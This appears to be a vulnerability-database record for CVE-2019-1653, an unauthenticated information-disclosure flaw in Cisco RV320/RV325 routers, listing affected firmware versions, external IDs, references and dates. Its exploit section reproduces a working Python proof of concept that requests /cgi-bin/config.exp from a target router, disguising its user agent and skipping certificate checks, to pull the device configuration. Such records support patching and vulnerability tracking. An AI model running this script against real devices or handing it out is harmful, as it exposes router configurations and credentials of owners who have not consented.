ID
VAR-E-201901-0044
CVE
cve_id: | CVE-2019-1653 | Trust: 4.3 |
cve_id: | CVE-2019-1652 | Trust: 1.8 |
EDB ID
46262
TITLE
Cisco RV300 / RV320 - Information Disclosure - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
Cisco RV300 / RV320 - Information Disclosure. CVE-2019-1653 . webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | cisco | model: | rv320 | scope: | - | version: | - | Trust: 3.0 |
vendor: | cisco | model: | rv300 rv320 | scope: | eq | version: | / | Trust: 2.1 |
vendor: | cisco | model: | rv325 dual gigabit wan vpn router | scope: | eq | version: | 1.4.2.17 | Trust: 0.6 |
vendor: | cisco | model: | rv325 dual gigabit wan vpn router | scope: | eq | version: | 1.4.2.15 | Trust: 0.6 |
vendor: | cisco | model: | rv320 dual gigabit wan vpn router | scope: | eq | version: | 1.4.2.17 | Trust: 0.6 |
vendor: | cisco | model: | rv320 dual gigabit wan vpn router | scope: | eq | version: | 1.4.2.15 | Trust: 0.6 |
vendor: | cisco | model: | rv325 dual gigabit wan vpn router | scope: | ne | version: | 1.4.2.20 | Trust: 0.6 |
vendor: | cisco | model: | rv320 dual gigabit wan vpn router | scope: | ne | version: | 1.4.2.20 | Trust: 0.6 |
vendor: | cisco | model: | rv320 rv325 unauthenticated | scope: | eq | version: | / | Trust: 0.5 |
vendor: | cisco | model: | rv325 dual gigabit wan vpn router | scope: | eq | version: | 1.4.2.19 | Trust: 0.3 |
vendor: | cisco | model: | rv325 dual gigabit wan vpn router | scope: | eq | version: | 1.4.2.18 | Trust: 0.3 |
vendor: | cisco | model: | rv325 dual gigabit wan vpn router | scope: | eq | version: | 1.4.2.16 | Trust: 0.3 |
vendor: | cisco | model: | rv320 dual gigabit wan vpn router | scope: | eq | version: | 1.4.2.19 | Trust: 0.3 |
vendor: | cisco | model: | rv320 dual gigabit wan vpn router | scope: | eq | version: | 1.4.2.18 | Trust: 0.3 |
vendor: | cisco | model: | rv320 dual gigabit wan vpn router | scope: | eq | version: | 1.4.2.16 | Trust: 0.3 |
vendor: | cisco | model: | rv325 dual gigabit wan vpn router | scope: | ne | version: | 1.4.2.19 | Trust: 0.3 |
vendor: | cisco | model: | rv320 dual gigabit wan vpn router | scope: | ne | version: | 1.4.2.19 | Trust: 0.3 |
EXPLOIT
# Exploit Title: 6coRV Exploit
# Date: 01-26-2018
# Exploit Author: Harom Ramos [Horus]
# Tested on: Cisco RV300/RV320
# CVE : CVE-2019-1653
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from fake_useragent import UserAgent
def random_headers():
return dict({'user-agent': UserAgent().random})
def request(url):
r = requests.Session()
try:
get = r.get(url, headers = random_headers(), timeout = 5, verify=False)#, allow_redirects=False
if get.status_code == 200:
return get.text
except requests.ConnectionError:
return 'Error Conecting'
except requests.Timeout:
return 'Error Timeout'
except KeyboardInterrupt:
raise
except:
return 0
print("")
print("##################################################")
print("CISCO CVE-2019-1653 POC")
print("From H. with love")
print("")
url = raw_input("URL> EX:http://url:port/ ")
url = url + "/cgi-bin/config.exp"
print(request(url))
Trust: 1.0
EXPLOIT LANGUAGE
py
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Information Disclosure
Trust: 1.6
TAGS
tag: | exploit | Trust: 4.0 |
tag: | web | Trust: 3.5 |
tag: | info disclosure | Trust: 1.0 |
tag: | remote | Trust: 0.5 |
tag: | code execution | Trust: 0.5 |
CREDITS
Harom Ramos
Trust: 0.6
EXTERNAL IDS
db: | NVD | id: | CVE-2019-1653 | Trust: 4.3 |
db: | NVD | id: | CVE-2019-1652 | Trust: 1.8 |
db: | EXPLOIT-DB | id: | 46262 | Trust: 1.6 |
db: | EDBNET | id: | 100896 | Trust: 0.6 |
db: | PACKETSTORM | id: | 152261 | Trust: 0.5 |
db: | PACKETSTORM | id: | 152262 | Trust: 0.5 |
db: | PACKETSTORM | id: | 151313 | Trust: 0.5 |
db: | PACKETSTORM | id: | 151374 | Trust: 0.5 |
db: | PACKETSTORM | id: | 151311 | Trust: 0.5 |
db: | PACKETSTORM | id: | 151312 | Trust: 0.5 |
db: | PACKETSTORM | id: | 152260 | Trust: 0.5 |
db: | PACKETSTORM | id: | 152305 | Trust: 0.5 |
db: | BID | id: | 106728 | Trust: 0.3 |
db: | BID | id: | 106732 | Trust: 0.3 |
REFERENCES
url: | https://nvd.nist.gov/vuln/detail/cve-2019-1653 | Trust: 4.0 |
url: | https://nvd.nist.gov/vuln/detail/cve-2019-1652 | Trust: 1.5 |
url: | https://software.cisco.com/download/home/284005929/type/282465789/release/1.4.2.20 | Trust: 0.6 |
url: | https://software.cisco.com/download/home/284005936/type/282465789/release/1.4.2.20 | Trust: 0.6 |
url: | http://www.cisco.com/ | Trust: 0.6 |
url: | https://www.exploit-db.com/exploits/46262/ | Trust: 0.6 |
url: | https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190123-rv-inject | Trust: 0.3 |
url: | https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-004/-cisco-rv320-command-injection | Trust: 0.3 |
url: | https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-003/-cisco-rv320-unauthenticated-diagnostic-data-retrieval | Trust: 0.3 |
url: | https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190123-rv-info | Trust: 0.3 |
SOURCES
db: | BID | id: | 106728 |
db: | BID | id: | 106732 |
db: | PACKETSTORM | id: | 152261 |
db: | PACKETSTORM | id: | 152262 |
db: | PACKETSTORM | id: | 151313 |
db: | PACKETSTORM | id: | 151374 |
db: | PACKETSTORM | id: | 151311 |
db: | PACKETSTORM | id: | 151312 |
db: | PACKETSTORM | id: | 152260 |
db: | PACKETSTORM | id: | 152305 |
db: | EXPLOIT-DB | id: | 46262 |
db: | EDBNET | id: | 100896 |
LAST UPDATE DATE
2024-03-21T15:09:38.627000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 106728 | date: | 2019-01-23T00:00:00 |
db: | BID | id: | 106732 | date: | 2019-01-23T00:00:00 |
SOURCES RELEASE DATE
db: | BID | id: | 106728 | date: | 2019-01-23T00:00:00 |
db: | BID | id: | 106732 | date: | 2019-01-23T00:00:00 |
db: | PACKETSTORM | id: | 152261 | date: | 2019-03-27T17:54:50 |
db: | PACKETSTORM | id: | 152262 | date: | 2019-03-27T17:55:45 |
db: | PACKETSTORM | id: | 151313 | date: | 2019-01-24T16:40:26 |
db: | PACKETSTORM | id: | 151374 | date: | 2019-01-29T00:48:50 |
db: | PACKETSTORM | id: | 151311 | date: | 2019-01-24T16:37:19 |
db: | PACKETSTORM | id: | 151312 | date: | 2019-01-24T16:39:16 |
db: | PACKETSTORM | id: | 152260 | date: | 2019-03-27T17:49:07 |
db: | PACKETSTORM | id: | 152305 | date: | 2019-03-30T00:52:21 |
db: | EXPLOIT-DB | id: | 46262 | date: | 2019-01-28T00:00:00 |
db: | EDBNET | id: | 100896 | date: | 2019-02-05T00:00:00 |